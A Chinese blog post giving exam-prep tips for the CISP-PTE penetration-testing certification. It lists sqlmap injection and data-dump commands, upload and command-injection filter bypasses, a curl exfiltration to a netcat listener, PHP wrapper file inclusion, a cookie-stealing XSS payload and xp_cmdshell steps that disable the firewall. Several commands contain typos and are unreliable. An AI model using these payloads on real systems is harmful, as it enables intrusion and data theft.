CISP-PTE,保安基础认证

江小悠 63 0

CISP-PTE是CISP体系一类认证的子认证,CISP-PTE是渗透测试方向的专业认证,课程以实操为主,包括操作系统安全、web安全、中间件安全、数据库安全,渗透测试五个知识类。

来龙去脉

今年11月我依旧坚守在保安的岗位上,写着我的日记,坐等下班,这时TRY队长来了。

CISP-PTE,保安基础认证

我赶紧起身敬礼,队长看到我这么认真尽责,露出了慈母般的微笑,拍了拍我的肩膀:小悠啊,辛苦了,我给你报了CISP-PTE的认证考试,希望你能继续努力!

CISP-PTE,保安基础认证

随后队长转身离去,短短几句,让我感激涕零。随后一个月时间我便开始学习最终12月去参加了考试。

CISP-PTE,保安基础认证

技巧分享

0x01 SQL注入

我今年考试的第一道实操题就是SQL注入,本次考试环境是Windows,工具全部在C盘,这题基本都是MySQL,肯定会有简单的拦截,直接上神器就行了--sqlmap

1.tamper绕过

python sqlmap.py -u http://www.xxx.com --level 5--risk 3 --dbms mysql --tamper "space2commet,versionedmorekeywords.py,unmagicquotes.py" --dbs

直接最高级别,记不住脚本名字就记住开头字母,直接到sqlmap文件里搜索

2.查看当前数据库

python sqlmap.py -u http://www.xxx.com --level 5--risk 3 --dbms mysql --tamper "space2commet,versionedmorekeywords.py,unmagicquotes.py" --current-db

3.查看数据表

python sqlmap.py -u http://www.xxx.com --level 5--risk 3 --dbms mysql --tamper "space2commet,versionedmorekeywords.py,unmagicquotes.py" --D 库名 --table

4.查看列名

python sqlmap.py -u http://www.xxx.com --level 5--risk 3 --dbms mysql --tamper "space2commet,versionedmorekeywords.py,unmagicquotes.py" --D 库名 -T 表名 --columns

5.查看数据

python sqlmap.py -u http://www.xxx.com --level 5--risk 3 --dbms mysql --tamper "space2commet,versionedmorekeywords.py,unmagicquotes.py" --D 库名 -T 表名 --C user,pass --dump

6. 读取写入文件

python sqlmap.py -u http://www.xxx.com --level 5--risk 3 --dbms mysql --tamper "space2commet,versionedmorekeywords.py,unmagicquotes.py" --file-read /var/www/html/key.php

or

--file-read

7.拿shell

python sqlmap.py -u http://www.xxx.com --level 5--risk 3 --dbms mysql --tamper "space2commet,versionedmorekeywords.py,unmagicquotes.py" --os-shell

or

--os-cmd

0x02 文件上传

打开burpsuite抓包,几种绕过方法一把梭,一般我直接上传免杀大马

1.MIME类型检测

抓包修改Content-Type为图片类型image/gif

2.黑名单检测

修改filename后缀,利用大小写等其他特性绕过

3.文件头检测

一般在文件头添加GIF89a绕过检测

0x03 命令执行

首先使用&、&&、|、||这几种符号是否能够执行成功,使用&&时ping 加-c 1 参数不然会一直ping下去,然后判断哪些被过滤逐一绕过

CISP-PTE,保安基础认证

1.通配符

ping 127.0.0.1 | cat ../key.?hp

2.空格被过滤

ping 127.0.0.1 |$IFS$9cat$IFS$9../key.?hp

3.黑名单绕过

ping 127.0.0.1 |$IFS$9c'a't$IFS$9../key.?hp

CISP-PTE,保安基础认证

4.curl

监听本地6666端口:nc -lvp 6666

执行命令:curl 192.168.1.1:6666 -T ../key.php

5.%0a换行

127.0.0.1%0als

0x04 文件包含

一般包含点为index.php?file=view.html,右键多看看源码会有提示,或者用御剑扫描路径,然后直接用各种协议执行代码

1.php://

php://filter/read=convert.base64-encode/resource=../key.php

读取到base64的key在burp里解密

2.data://

data://text/plain,

or

data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

0x05 跨站脚本

今年12月考试没遇到xss,一般就是写个钩子,存储型xss漏洞,存在waf再各种绕过,方法一抓一大把

<script>window.open('http://192.168.1.1/xss.php?cookie='+document.cookie)</script>

0x06 代码审计

代码审计一般是php代码,多看看php代码就行了,如果实在看不懂可以放弃这题,70分及格,20分选择题差不多能拿个15分吧,后面一个key10分,总共8个key

0x07 综合渗透

环境一般是.net+mssql的Windows2003环境,一般登录密码是qwerty,今年去考试时碰巧就是这个密码,1s登录进去直接就拿了key,后面拿shell,key一般在文件夹里或者数据库里,还有种情况key在robots.txt文件,最后要到桌面垃圾桶拿key

1.翻、扫、爆破、上传、注入

先翻看熟悉网站,然后扫描端口、目录,爆破登录,一般在后台找上传sql注入点

2.拿webshell再拿数据库

如果拿到webshell权限为systeam可以直接修改Adminstartor密码,但如果拿到webshell权限很低,数据库一般是root权限,通过查找数据库配置文件,使用Navicat登录数据库,利用MSSQL存储过程执行命令,命令不记得可以在工具箱找找

开启xp_cmdshell存储过程:

sp_configure 'xp_cmdshell',1;

reconfigure;

使用xp_cmdshell查看权限:

exec xp_cmdshell 'whoami';

关闭防火墙:

exec xp_cmdshell 'netsh firewall set opmode mod=disable';

开启3389:

工具箱里有直接用

修改账户密码或者添加账户或者提取账户密码,方法很多,这里可以直接使用工具箱提权工具,最后mstsc连接

以上就是经验总结,记住上面简单命令基本就没什么问题,如有错误欢迎指正,QQ技术交流群:994726223

CISP-PTE,保安基础认证

发表评论 取消回复
表情 图片 链接 代码

分享